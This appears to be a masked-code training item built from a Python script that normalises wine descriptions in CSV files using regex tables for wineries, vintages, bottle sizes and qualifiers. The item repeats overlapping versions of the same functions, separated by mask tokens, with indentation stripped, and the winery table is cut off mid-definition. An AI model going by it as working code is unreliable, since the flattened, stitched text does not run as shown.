if debug:
print('bwgl:build other from winery')
wineryFind, other = findStrInRecReturnOther(rec, fldWineDescr,
winery, debug=debug)
if 'case' in other:
other.remove('case')
if debug:
print('bwgl:remove case from other')
if other:
if debug:
print('bwgl:looking at other for quals, bottlesize and vintage'
)
if not other[-1].isdigit():
for qual, reQual in reQualLookup:
if qual == other[-1]:
if debug:
print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
if other and not other[-1].isdigit():
for size, reSize in sizeLookup:
if size == other[-1]:
if debug:
print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
if other and other[-1].isdigit():
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery
] and other[-1] in ignoreGrapeLookup[winery]:
if debug:
print(
'bwgl:value is in ignoreLookupGrape - keeping it:',
other[-1])
else:
if debug:
print('bwgl:remove vintage from other:', other[-1])
del other[-1]
if wine and wine in other:
other.remove(wine)
if debug:
print('bwgl:remove wine from other:', wine)
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine,
':', liquor, ':', other, ':', rec[fldWineDescr], ':',
rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if grape is None and wine is not None:
grape = wine
if debug:
print('bwgl:set-grape-to-wine:', grape)
if debug:
print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
if winery not in wgLookup:
wgLookup[winery] = {grape: []}
elif grape not in wgLookup[winery]:
wgLookup[winery][grape] = []
if other and other not in wgLookup[winery][grape]:
wgLookup[winery][grape].append(other)
if debug:
print('bwgl:appending to wgLookup:other:', other)
if debug:
print('bwgl:complete-read-of-master-file:sort wgLookup')
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=
len, reverse=True)
if debug:
print('\n' * 5)
print('START WGLOOKUP DUMPED')
print('#' * 80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#' * 80)
return wgLookup
def findAddAttribWgLookup(rec, winery, value, fldWine, AbbrLookup=[],
defaultorderlist=None, valueDescr='', debug=False):
singlematch = []
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[
fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
for valuematchset in wgLookup[winery][value]:
if debug:
print('faawl:testing valuematchset:', valuematchset, ':length:',
len(valuematchset))
allmatch = True
for valuematch in valuematchset:
reMatch1 = re.compile('\\b' + valuematch + '\\b', re.IGNORECASE)
reMatch2 = re.compile('\\s' + valuematch + '\\s', re.IGNORECASE)
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
allmatch = True and allmatch
elif valuematch in AbbrLookup:
if debug:
print('faawl:valuematch-abbr:', valuematch, ':',
wineAbbrLookup[valuematch])
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
allmatch = False and allmatch
if debug:
print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
if allmatch:
if debug:
print('faawl:value matched:', valuematchset)
if len(valuematchset) == 1:
if debug:
print('faawl:single-valuematch-set-added-to-singlematch:',
valuematchset)
singlematch.append(valuematchset)
else:
if debug:
print('faawl:multivalue-valuematch-set-found:done')
return valuematchset
if not singlematch:
if debug:
print('faawl:exit with singlematch NOT populated return blank')
return []
if debug:
print('faawl:exit with singlematch populated:', singlematch)
if len(singlematch) == 1 or not defaultorderlist:
if debug:
print('faawl:return first entry in singlematch:', singlematch[0])
return singlematch[0]
defaultorder = defaultorderlist[:]
if debug:
print('faawl:multiple single match value-singlematch:', singlematch)
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0, val)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug:
print('faawl:Change from:', valuematchset, ':to Tok for mondavi')
return ['Tok']
for val in defaultorder:
if val in singlematch:
if debug:
print('faawl:selected-singlematch-value:', val)
return val
if debug:
print('faawl:valuematchset-empty')
return []
<mask token>
def setDigitFld2Value(wines, fld, value, debug=False):
for rec in wines:
if rec[fld].isdigit():
rec[fld] = value
def updateFileOptionDictCheck(optiondict, wines, header, debug=False):
if optiondict['fldWineDescr'] not in wines[0]:
if debug:
print('updateFileOptionDictCheck:fldWineDescr NOT in file read in:'
, optiondict['fldWineDescr'])
if 'cnt' in wines[0]:
print('setting values fldWineDescr and fldWineDescrNew to: cnt')
optiondict['fldWineDescr'] = optiondict['fldWineDescrNew'] = 'cnt'
elif 'winedescr' in wines[0]:
print(
'setting values fldWineDescr to winedescr and fldWineDescrNew to winedescrnew'
)
optiondict['fldWineDescr'] = 'winedescr'
optiondict['fldWineDescrNew'] = 'winedescrnew'
else:
print('could not find fldWineDescr in wines[0]-aborting:',
optiondict['fldWineDescr'], '\nwines[0]:', wines[0])
error = wines[0][optiondict['fldWineDescr']]
if False and optiondict['fldWineDescr'] == 'winedescr':
if not optiondict['fldWineDescrMatch']:
optiondict['fldWineDescrMatch'] = 'same'
print('setting value fldWineDescrMatch to: same')
if optiondict['csvfile_update_in'] == optiondict['csvfile_update_out']:
file_path, base_filename, file_ext = kvutil.filename_split(optiondict
['csvfile_update_in'])
backupfile = kvutil.filename_proper(base_filename + optiondict[
'backupfile_ext'], file_path)
print('copying ', optiondict['csvfile_update_in'], ' to ', backupfile)
shutil.copyfile(optiondict['csvfile_update_in'], backupfile)
if optiondict['fldWineDescrNew'] == 'cnt':
optiondict['csvdictkeys'] = ['cnt', 'date', 'search', 'store',
'wine', 'winesrt']
elif optiondict['fldWineDescrMatch']:
optiondict['csvdictkeys'] = [optiondict['fldWineDescr'], optiondict
['fldWineDescrNew'], optiondict['fldWineDescrMatch'], *header]
else:
optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew']] + header[1:
]
print('updateFileOptionDictCheck:set csvdictkeys to:', optiondict[
'csvdictkeys'])
<mask token>
| <mask token>
def globalVariableCheck(debug=False):
for liquor in liquorLookup:
if liquor in noGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in noGrapeLookup:'
, liquor)
if liquor in ignoreGrapeLookup:
print(
'WARNING:liquorLookup regexs will never execute - they are in ignoreGrapeLookup:'
, liquor)
for winery in ignoreGrapeLookup:
if winery in noGrapeLookup:
print(
'WARNING:ignoreGrapeLookup regexs will never execute - they are in noGrapeLookup:'
, winery)
def setOptionDictMasterFldValues(optiondict, debug=False):
for fld in ('fldWine', 'fldWineDescr'):
if not optiondict[fld + 'Master']:
optiondict[fld + 'Master'] = optiondict[fld]
def wineLookupByName(nameLookup, lookupStr, other, msg, wineAbbrLookup=None,
debug=False):
funcname = 'wineLookupByName:' + msg + ':'
if debug:
print(funcname + 'nameLookup:', nameLookup)
if nameLookup is None:
if debug:
print(funcname + 'match: value is none - continue on')
return ''
for name in nameLookup:
if debug:
print(funcname + 'match-name:', name)
if name is None:
if debug:
print(funcname +
'name-matched: value is none - continue on:pass back blank'
)
return ''
reName = re.compile('\\b' + name + '\\b', re.IGNORECASE)
if reName.search(lookupStr):
if debug:
print(funcname + 'name-MATCHED:', name)
for val in other:
if reName.search(val):
other.remove(val)
if debug:
print(funcname + 'name-remove-from-other:', val)
return name
if wineAbbrLookup and name in wineAbbrLookup:
reName = re.compile(wineAbbrLookup[name], re.IGNORECASE)
if debug:
print(funcname + 'Abbr-match-name:', name)
if reName.search(lookupStr):
if debug:
print(funcname + 'Abbr-name-MATCHED:', wineAbbrLookup[name]
)
for val in other:
if reName.search(val):
other.remove(val)
if debug:
print(funcname + 'name-remove-from-other:', val)
return name
if debug:
print(funcname + 'name match not found:set to blank')
return None
def findQualifier(wine, debug=False):
for val, reSearch in reQualLookup:
if reSearch.search(wine):
if debug:
print('findQualifier:matched-returning:', val)
return val
if debug:
print('findQualifier:no-match-returning:', None)
return None
def findWinery(rec, lastWinery, lastReWinery, fldWine, debug=False):
if lastWinery:
if debug:
try:
print('fw:new winery:', rec[fldWine])
except Exception as e:
print('debug error8-continuing:', str(e))
print('rec[fldWine]:type:', type(rec[fldWine]))
print('fw:checking if this is lastWinery:', lastWinery)
if lastReWinery.search(rec[fldWine]):
if debug:
print('fw:this matches the last winery')
return lastWinery, lastReWinery
elif debug:
print('fw:not last winery')
for winery, reWinery in wineryLookup:
if debug:
print('fw:not lastWinery-checking winery:', winery)
if fldWine not in rec:
print('not a column in this record fldWine:', fldWine)
print('rec:', rec)
if reWinery.search(rec[fldWine]):
if debug:
print('fw:winery match found:', winery)
return winery, reWinery
return None, None
def findLiquor(rec, winery, fldWine, debug=False):
for liquor, reLiquor in liquorLookup[winery]:
if debug:
print('fl:checking liquor:', liquor)
if reLiquor.search(rec[fldWine]):
if debug:
print('fl:liquor match found:', liquor)
return liquor, reLiquor
return None, None
def findGrapeByRegex(rec, fldWine, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fgbr:grape:', grape)
if grape is not None and reGrape.search(rec[fldWine]):
if debug:
print('fgbr:grape match found:', grape)
return grape, reGrape
return None, None
def findStrInRecReturnOther(rec, fldWineDescr, findStr, debug=False):
matchLoc = rec[fldWineDescr].find(findStr)
if matchLoc > -1:
other = rec[fldWineDescr][matchLoc + len(findStr) + 1:].split()
if debug:
print('fsirro:findStr matched:', findStr)
if debug:
print('fsirro:findStr other:', other)
return findStr, other
if debug:
print('fsirro:findStr did not match using:', findStr)
return None, []
def findGrapeByStr(rec, fldWineDescr, debug=False):
for grape, reGrape in grapeLookup:
if debug:
print('fg:grape:', grape)
grape, other = findStrInRecReturnOther(rec, fldWineDescr, grape,
debug=debug)
if grape:
return grape, other
return None, []
def findVintage(rec, fldWine, debug=False):
for reVintage in vintageLookup:
m = reVintage.search(rec[fldWine])
if m:
if m.group(1):
vintage = m.group(1)
if debug:
print('fv:vintage-match:', reVintage, ':group1')
elif m.group(2):
vintage = m.group(2)
if debug:
print('fv:vintage-match:', reVintage, ':group2')
elif m.group(3):
vintage = m.group(3)
if debug:
print('fv:vintage-match:', reVintage, ':group3')
else:
vintage = m.group(4)
if debug:
print('fv:vintage-match:', reVintage, ':group4')
return vintage
return None
def buildWineryGrapeLookup(wines, fldWineDescr='winedescr', fldWine='wine',
debug=False):
wgLookup = {}
lastWinery = None
lastReWinery = None
for rec in wines:
if debug:
print('bwgl:new rec:', rec[fldWineDescr])
if not fldWineDescr in rec:
print('creating-field:', fldWineDescr)
rec[fldWineDescr] = ''
winery = grape = wine = liquor = None
other = []
lastWinery, lastReWinery = winery, reWinery = findWinery(rec,
lastWinery, lastReWinery, fldWine, debug=debug)
if not winery:
if debug:
print('bwgl:did not find winery-skipping:', rec[fldWine])
continue
if winery in ignoreGrapeLookup:
wine = ''
if debug:
print('bwgl:wine check ignoreGrapeLookup on winery:', winery)
elif winery in noGrapeLookup:
if debug:
print('bwgl:wine check noGrapeLookup on winery:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWineDescr
], [], 'noGrapeLookup', debug=debug)
if False and wine == '':
if debug:
print('bwgl:nograpelookup:no-match:set wine to None')
wine = None
elif winery in liquorLookup:
if debug:
print('bwgl:liquor check on winery:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('bwgl:liquor found and put in wine:', wine)
if wine is None:
if debug:
print('bwgl:grape check because wine is None')
grape, other = findGrapeByStr(rec, fldWineDescr)
if debug:
print('bwgl:grape:', grape, ':other:', other)
elif debug:
print('bwgl:grape check skipped - we have a wine')
if wine is None and grape is None:
if debug:
print('bwgl:record skipped - no grape or wine defined')
continue
if grape is None:
if debug:
print('bwgl:build other from winery')
wineryFind, other = findStrInRecReturnOther(rec, fldWineDescr,
winery, debug=debug)
if 'case' in other:
other.remove('case')
if debug:
print('bwgl:remove case from other')
if other:
if debug:
print('bwgl:looking at other for quals, bottlesize and vintage'
)
if not other[-1].isdigit():
for qual, reQual in reQualLookup:
if qual == other[-1]:
if debug:
print('bwgl:remove qualifier from other:', qual)
del other[-1]
break
if other and not other[-1].isdigit():
for size, reSize in sizeLookup:
if size == other[-1]:
if debug:
print('bwgl:remove bottlesize from other:', size)
del other[-1]
break
if other and other[-1].isdigit():
if winery in ignoreGrapeLookup and ignoreGrapeLookup[winery
] and other[-1] in ignoreGrapeLookup[winery]:
if debug:
print(
'bwgl:value is in ignoreLookupGrape - keeping it:',
other[-1])
else:
if debug:
print('bwgl:remove vintage from other:', other[-1])
del other[-1]
if wine and wine in other:
other.remove(wine)
if debug:
print('bwgl:remove wine from other:', wine)
if debug:
try:
print('bwgl:Final-Build:', winery, ':', grape, ':', wine,
':', liquor, ':', other, ':', rec[fldWineDescr], ':',
rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if grape is None and wine is not None:
grape = wine
if debug:
print('bwgl:set-grape-to-wine:', grape)
if debug:
print('bwgl:create wgLookup for winery:', winery, ':grape:', grape)
if winery not in wgLookup:
wgLookup[winery] = {grape: []}
elif grape not in wgLookup[winery]:
wgLookup[winery][grape] = []
if other and other not in wgLookup[winery][grape]:
wgLookup[winery][grape].append(other)
if debug:
print('bwgl:appending to wgLookup:other:', other)
if debug:
print('bwgl:complete-read-of-master-file:sort wgLookup')
for winery in wgLookup:
for grape in wgLookup[winery]:
wgLookup[winery][grape] = sorted(wgLookup[winery][grape], key=
len, reverse=True)
if debug:
print('\n' * 5)
print('START WGLOOKUP DUMPED')
print('#' * 80)
if ppFlag:
pp.pprint(wgLookup)
else:
print('bwgl:final-wgLookup:\n', wgLookup)
print('#' * 80)
return wgLookup
def findAddAttribWgLookup(rec, winery, value, fldWine, AbbrLookup=[],
defaultorderlist=None, valueDescr='', debug=False):
singlematch = []
if debug:
try:
print('faawl:value:', valueDescr, ':match-wgLookup:', rec[
fldWine], ':', wgLookup[winery][value])
except Exception as e:
print('debug error7-continuing:', str(e))
print('fldWine:', fldWine)
for valuematchset in wgLookup[winery][value]:
if debug:
print('faawl:testing valuematchset:', valuematchset, ':length:',
len(valuematchset))
allmatch = True
for valuematch in valuematchset:
reMatch1 = re.compile('\\b' + valuematch + '\\b', re.IGNORECASE)
reMatch2 = re.compile('\\s' + valuematch + '\\s', re.IGNORECASE)
m1 = reMatch1.search(rec[fldWine])
m2 = reMatch2.search(rec[fldWine])
if m1 or m2:
allmatch = True and allmatch
elif valuematch in AbbrLookup:
if debug:
print('faawl:valuematch-abbr:', valuematch, ':',
wineAbbrLookup[valuematch])
reMatch = re.compile(wineAbbrLookup[valuematch], re.IGNORECASE)
allmatch = reMatch.search(rec[fldWine]) and allmatch
else:
allmatch = False and allmatch
if debug:
print('faawl:valuematch:', valuematch, ':allmatch:', allmatch)
if allmatch:
if debug:
print('faawl:value matched:', valuematchset)
if len(valuematchset) == 1:
if debug:
print('faawl:single-valuematch-set-added-to-singlematch:',
valuematchset)
singlematch.append(valuematchset)
else:
if debug:
print('faawl:multivalue-valuematch-set-found:done')
return valuematchset
if not singlematch:
if debug:
print('faawl:exit with singlematch NOT populated return blank')
return []
if debug:
print('faawl:exit with singlematch populated:', singlematch)
if len(singlematch) == 1 or not defaultorderlist:
if debug:
print('faawl:return first entry in singlematch:', singlematch[0])
return singlematch[0]
defaultorder = defaultorderlist[:]
if debug:
print('faawl:multiple single match value-singlematch:', singlematch)
for val in singlematch[::-1]:
if val not in defaultorder:
defaultorder.insert(0, val)
if winery == 'Mondavi' and ['Tok'] in singlematch:
if debug:
print('faawl:Change from:', valuematchset, ':to Tok for mondavi')
return ['Tok']
for val in defaultorder:
if val in singlematch:
if debug:
print('faawl:selected-singlematch-value:', val)
return val
if debug:
print('faawl:valuematchset-empty')
return []
def setWineryDescrFromWineryGrapeLookup(wgLookup, wines, fldWineDescr=
'winedescr', fldWine='wine', fldWineDescrNew='winedescrnew',
fldWineDescrMatch=False, debug=False):
if debug:
print('\n' * 10,
'START WINEDESCR SETTING HERE ---------------------------------------------'
)
for rec in wines:
(winery) = (grape) = (wine) = (vintage) = (case) = (size) = (liquor
) = (nongrape) = (qual) = None
winematchset = grapematchset = []
if debug:
try:
print('setWinery:fldWine:', rec[fldWine])
except Exception as e:
print('debug error2-continuing:', str(e))
print('fldWine:', fldWine)
if fldWineDescrNew not in rec:
rec[fldWineDescrNew] = rec[fldWineDescr]
winery, reWinery = findWinery(rec, None, None, fldWine, debug=debug)
if winery is None:
if debug:
print('setWinery:winery not found-next record:' + rec[fldWine])
continue
elif winery not in wgLookup:
if debug:
print('setWinery:winery not in wgLookup:', winery)
continue
grape, reGrape = findGrapeByRegex(rec, fldWine, debug=debug)
if debug:
print('setWinery:grape found:', grape)
if winery in ignoreGrapeLookup:
if debug:
print(
'setWinery:winery-match-ignoreGrape:clear-wine:set-grape-to-None:set-nongrape-True:winery:'
, winery)
wine = ''
grape = None
nongrape = True
if winery in noGrapeLookup:
if debug:
print('setWinery:noGrapeLookup wine check:', winery)
wine = wineLookupByName(noGrapeLookup[winery], rec[fldWine], [],
'noGrapeLookup', wineAbbrLookup, debug=debug)
if debug:
print('setWinery:nogrape check:wine:', wine)
if wine == '':
if debug:
print(
'setWinery:noGrapeLookup:matched:None::clear grape:set nongrape to True'
)
grape = None
wine = ''
nongrape = True
elif wine:
grape = None
if debug:
print(
'setWinery:nograpeLookup:wine found - clear grape field'
)
if wine is None and winery in liquorLookup:
if debug:
print('setWinery:liqourLookup:', winery)
liquor, reLiquor = findLiquor(rec, winery, fldWine, debug=debug)
if liquor is not None:
wine = liquor
if debug:
print('setWinery:liquorLookup-match:', liquor)
if not grape and not nongrape and not wine and liquor is None:
if debug:
print('setWinery:did not find grape-skipping record:', rec[
fldWineDescr])
continue
if debug:
print('setWinery:pre-vintage found values for wine/liquor:',
wine, ':grape:', grape)
vintage = findVintage(rec, fldWine, debug=debug)
if debug:
print('setWinery:vintage:', vintage)
if reCase.search(rec[fldWine]):
case = 'case'
for size, reSize in sizeLookup:
if debug:
print('setWinery:sizeLookup:', size)
if reSize.search(rec[fldWine]) and not reShipsAs.search(rec[
fldWine]):
if debug:
print('setWinery:sizeLookup:matched:', reSize)
break
else:
size = None
if debug:
print('setWinery:sizeLookup:None-found')
qual = findQualifier(rec[fldWine], debug=debug)
if debug:
try:
print('setWinery:FinalAttributes:', winery, ':', grape, ':',
wine, ':', liquor, ':', vintage, ':', case, ':', size,
':', qual, ':', rec[fldWine])
except Exception as e:
print('debug error5-continuing:', str(e))
print('fldWine:', fldWine)
if liquor is not None:
if debug:
print(
'setWinery:liquor flag set - no additional data needs to be collected'
)
elif wine is not None:
if debug:
print(
'setWinery:wine is not None - do additional lookups:wine:',
wine)
if wine in wgLookup[winery] and wgLookup[winery][wine]:
if debug:
print('setWinery:lookup winematchset')
winematchset = findAddAttribWgLookup(rec, winery, wine,
fldWine, wineAbbrLookup, None, valueDescr='wine', debug
=debug)
else:
print('setWinery:unable to perform wgLookup on winery:',
winery, ':wine:', wine, ':rec-wine:', rec[fldWine])
if debug:
try:
print('wgLookup[winery]:', wgLookup[winery])
except Exception as e:
print('debug error3-continuing:', str(e))
print('winery:', winery)
if debug:
print('setWinery:winematchset:', winematchset)
elif grape is not None:
if debug:
print('setWinery:grape is not None - do additional lookups:',
grape)
if grape in wgLookup[winery] and wgLookup[winery][grape]:
grapematchset = findAddAttribWgLookup(rec, winery, grape,
fldWine, wineAbbrLookup, defaultorderlist, valueDescr=
'grape', debug=debug)
elif grape in wgLookup[winery]:
if debug:
print(
'setWinery:grape match: matching record set is blank - no action required'
)
else:
print('setWinery:grape NONMATCH:', rec[fldWine])
if debug:
print('setWinery:liquor:', liquor, ':wine:', wine,
':grape:', grape, ':wgLookup[winery]:', wgLookup[
winery])
if debug:
print('setWinery:grapematchset:', grapematchset)
if vintage:
newVintageLookupWine = rec[fldWine]
for matchvalue in winematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(
matchvalue, '')
if debug:
print(
'setWinery:2nd-vintage:winematchset:wine-name-removal:'
, matchvalue)
for matchvalue in grapematchset:
if vintage in matchvalue:
newVintageLookupWine = newVintageLookupWine.replace(
matchvalue, '')
if debug:
print(
'setWinery:2nd-vintage:grapematchset:wine-name-removal:'
, matchvalue)
if newVintageLookupWine != rec[fldWine]:
if debug:
print('setWinery:2nd-vintage:newVintageLookupWine:',
newVintageLookupWine)
newVintage = findVintage({fldWine: newVintageLookupWine},
fldWine, debug=debug)
if debug:
print('setWinery:2nd-vintage:newVintage:', newVintage)
vintage = newVintage
wineDescr = ''
if winery.startswith('z'):
vintage = None
if debug:
print('setWinery:winery starts with z: clear vintage')
if winematchset and ' '.join(winematchset) in wine:
if debug:
print('setWinery:clearing-winematchset:', winematchset,
':is-in-wine:', wine)
winematchset = []
if grapematchset and ' '.join(grapematchset) in grape:
if not (len(grapematchset) == 1 and len(grapematchset[0]) == 1):
if debug:
print('setWinery:clearing-grapematchset:',
grapematchset, ':is-in-grape:', grape)
grapematchset = []
if grapematchset and size and size in ' '.join(grapematchset):
size = ''
if winematchset and size and size in ' '.join(winematchset):
size = ''
if debug:
print('setWinery:vallist1:', [winery, grape, wine] +
grapematchset + winematchset + [vintage, size, qual, case])
print('setWinery:vallist2:', [winery, grape, wine, *
grapematchset, *winematchset, vintage, size, qual, case])
wdList = []
for val in ([winery, grape, wine] + grapematchset + winematchset +
[vintage, size, qual, case]):
if val:
wdList.append(val)
wineDescr = ' '.join(wdList)
if False:
if debug:
print('setWinery:wdList:', wdList)
if debug:
print('setWinery:wineDescr:', wineDescr)
if debug:
try:
print(':'.join(['setWinery:wineDescrList', wineDescr, rec[
fldWineDescr], str(wineDescr == rec[fldWineDescr]), rec
[fldWine]]))
except Exception as e:
print('debug error6-continuing:', str(e))
print('fldWine:', fldWine)
rec[fldWineDescrNew] = wineDescr
if fldWineDescrMatch:
rec[fldWineDescrMatch] = rec[fldWineDescr] == rec[fldWineDescrNew]
def setDigitFld2Value(wines, fld, value, debug=False):
for rec in wines:
if rec[fld].isdigit():
rec[fld] = value
def updateFileOptionDictCheck(optiondict, wines, header, debug=False):
if optiondict['fldWineDescr'] not in wines[0]:
if debug:
print('updateFileOptionDictCheck:fldWineDescr NOT in file read in:'
, optiondict['fldWineDescr'])
if 'cnt' in wines[0]:
print('setting values fldWineDescr and fldWineDescrNew to: cnt')
optiondict['fldWineDescr'] = optiondict['fldWineDescrNew'] = 'cnt'
elif 'winedescr' in wines[0]:
print(
'setting values fldWineDescr to winedescr and fldWineDescrNew to winedescrnew'
)
optiondict['fldWineDescr'] = 'winedescr'
optiondict['fldWineDescrNew'] = 'winedescrnew'
else:
print('could not find fldWineDescr in wines[0]-aborting:',
optiondict['fldWineDescr'], '\nwines[0]:', wines[0])
error = wines[0][optiondict['fldWineDescr']]
if False and optiondict['fldWineDescr'] == 'winedescr':
if not optiondict['fldWineDescrMatch']:
optiondict['fldWineDescrMatch'] = 'same'
print('setting value fldWineDescrMatch to: same')
if optiondict['csvfile_update_in'] == optiondict['csvfile_update_out']:
file_path, base_filename, file_ext = kvutil.filename_split(optiondict
['csvfile_update_in'])
backupfile = kvutil.filename_proper(base_filename + optiondict[
'backupfile_ext'], file_path)
print('copying ', optiondict['csvfile_update_in'], ' to ', backupfile)
shutil.copyfile(optiondict['csvfile_update_in'], backupfile)
if optiondict['fldWineDescrNew'] == 'cnt':
optiondict['csvdictkeys'] = ['cnt', 'date', 'search', 'store',
'wine', 'winesrt']
elif optiondict['fldWineDescrMatch']:
optiondict['csvdictkeys'] = [optiondict['fldWineDescr'], optiondict
['fldWineDescrNew'], optiondict['fldWineDescrMatch'], *header]
else:
optiondict['csvdictkeys'] = [optiondict['fldWineDescrNew']] + header[1:
]
print('updateFileOptionDictCheck:set csvdictkeys to:', optiondict[
'csvdictkeys'])
<mask token>
| <mask token>
import kvutil
import kvcsv
import re
import sys
import shutil
import pprint
pp = pprint.PrettyPrinter(indent=4)
ppFlag = False
optiondictconfig = {'AppVersion': {'value': '1.13', 'description':
'defines the version number for the app'}, 'debug': {'value': False,
'type': 'bool', 'description':
'defines if we are running in debug mode'}, 'verbose': {'value': 1,
'type': 'int', 'description':
'defines the display level for print messages'}, 'setup_check': {
'value': False, 'type': 'bool', 'description':
'defines if we checking out setup'}, 'pprint': {'value': False, 'type':
'bool', 'description':
'defines if we output with pretty print when debugging'},
'csvfile_master_in': {'value': 'wine_xref.csv', 'description':
'defines the name of the master data input file'}, 'csvfile_update_in':
{'value': 'wineref.csv', 'description':
'defines the name of the input file to updated'}, 'csvfile_update_out':
{'value': 'wineref2.csv', 'description':
'defines the name of the updated output file'}, 'fldWine': {'value':
'wine', 'description':
'defines the name of the field that holds the Wine '}, 'fldWineDescr':
{'value': 'winedescr', 'description':
'defines the name of the field holding the wine description'},
'fldWineDescrNew': {'value': 'winedescrnew', 'description':
'defines the name of the NEW field holding the new description '},
'fldWineDescrMatch': {'value': None, 'description':
'defines the name of the NEW field holding the results of comparison existing to new description '
}, 'fldWineMaster': {'value': None, 'description':
'defines the name of the field that holds the Wine when reading the master file '
}, 'fldWineDescrMaster': {'value': None, 'description':
'defines the name of the field holding the wine description when reading the master file'
}, 'backupfile_ext': {'value': '.bak', 'description':
'defines the extension to use to copy the update input file to if we are replacing it with output'
}, 'defaultnew': {'value': None, 'description':
'defines if we should take field fldWineDescrNew and set to a value if not set'
}}
vintageLookup = re.compile('\\d\\d\\d\\d\\s+\\d\\d(\\d\\d)'), re.compile(
'^\\d\\d(\\d\\d)'), re.compile('\\s\\d\\d(\\d\\d)$'), re.compile(
'\\s\\d\\d(\\d\\d)\\s'), re.compile('XX\\d\\d(\\d\\d)\\s'), re.compile(
'\\s\\d\\d(\\d\\d)\\/'), re.compile("\\s'?(\\d\\d)'?$|\\s'?(\\d\\d)'?\\s")
reCase = re.compile('12\\s*X\\s*750\\s*ML|\\bcase\\b|12\\/750\\s*ML', re.
IGNORECASE)
reQualLookup = (None, re.compile('\\bWithout\\s+Gift\\b|\\bNo\\s+Gift', re.
IGNORECASE)), ('Gift', re.compile('\\bGift\\b', re.IGNORECASE)), ('VAP',
re.compile('\\bVAP\\b', re.IGNORECASE)), ('VAP', re.compile(
'\\bGlassVAP\\b', re.IGNORECASE)), ('Glass', re.compile('\\bGlass\\b',
re.IGNORECASE)), ('Glass', re.compile('\\bGlasses\\b', re.IGNORECASE)), (
'Etch', re.compile('\\bEtch\\b', re.IGNORECASE)), ('Basket', re.compile
('\\bBasket\\b', re.IGNORECASE))
sizeLookup = ('1.75L', re.compile('\\b1\\.75\\s*Li?|\\b1\\.75$', re.IGNORECASE)
), ('1.5L', re.compile('\\b1\\.5\\s*L?\\b|\\bMagnum\\b', re.IGNORECASE)), (
'375mL', re.compile('Half\\s+Bottle|375ml', re.IGNORECASE)), ('200mL',
re.compile('\\b200\\s*ML|\\(200\\s*ML', re.IGNORECASE)), ('50mL', re.
compile('\\b50\\s*ML|\\(50\\s*ML', re.IGNORECASE)), ('500mL', re.
compile('\\b500\\s*ML|\\(500\\s*ML', re.IGNORECASE)), ('3L', re.compile
('\\b3\\s*Li?', re.IGNORECASE)), ('6L', re.compile('\\b6\\s*Li?', re.
IGNORECASE)), ('9L', re.compile('\\b9\\s*Li?', re.IGNORECASE)), ('1L',
re.compile(
'\\b1L\\b|\\b1\\s+L$|\\b1.0\\s*L\\b|\\b1\\s+Liter\\b|\\bOne\\s+Liter\\b|\\bLITER\\b|\\b1\\s*LTR'
, re.IGNORECASE))
wineryLookup = ('Alban', re.compile('\\bAlban\\b', re.IGNORECASE)), ('Arrowood'
, re.compile('\\bArrowood\\b', re.IGNORECASE)), ('Atalon', re.compile(
'\\bAtalon\\b', re.IGNORECASE)), ('Attune', re.compile('\\bAttune\\b',
re.IGNORECASE)), ('Auteur', re.compile('\\bAuteur\\b', re.IGNORECASE)), (
'Austin Hope', re.compile('\\bAustin\\s+Hope\\b', re.IGNORECASE)), ('Badge'
, re.compile('\\bBadge\\b', re.IGNORECASE)), ('Balletto', re.compile(
'\\bBalletto\\b', re.IGNORECASE)), ('Bell', re.compile(
'\\bBell\\s+Cellar', re.IGNORECASE)), ('BR Cohn', re.compile(
'\\bB\\.?\\s?R\\.?\\s+Cohn\\b', re.IGNORECASE)), ('Bremer', re.compile(
'\\bBremer\\b', re.IGNORECASE)), ('Brewer-Clifton', re.compile(
'\\bBrewer[\\s\\-]Clifton\\b', re.IGNORECASE)), ('BV', re.compile(
'\\bBeaulieu\\s+V|\\bBV\\b', re.IGNORECASE)), ('Belle Glos', re.compile
('\\bBelle\\s+Glos\\b', re.IGNORECASE)), ('Bennett Ln', re.compile(
'\\bBennet+\\sLane\\b', re.IGNORECASE)), ('Benovia', re.compile(
'\\bBenovia\\b', re.IGNORECASE)), ('Beringer', re.compile(
'\\bBeringer\\b', re.IGNORECASE)), ('Blackstone', re.compile(
'\\bBlackstone\\b', re.IGNORECASE)), ('Brancott', re.compile(
'\\bBrancott\\b', re.IGNORECASE)), ('Cade', re.compile('\\bCade\\b', re
.IGNORECASE)), ('Cain Five', re.compile(
'\\bCain\\s+Five\\b|\\bCain\\s-\\sFive\\b|\\bCain\\s5\\b|\\bCainFive\\b',
re.IGNORECASE)), ('Cakebread', re.compile('\\bCakebread\\b', re.IGNORECASE)
), ('Cardinale', re.compile('\\bCardinale\\b', re.IGNORECASE)), ('Caymus',
re.compile('\\bCaymus\\b', re.IGNORECASE)), ('Chappellet', re.compile(
'\\bChappellet\\b', re.IGNORECASE)), ('Chalk Hill', re.compile(
'\\bChalk\\s+Hill\\b', re.IGNORECASE)), ('Clos Du Bois', re.compile(
'\\bClos\\s+Du\\s+Bois\\b', re.IGNORECASE)), ('ClosDuVal', re.compile(
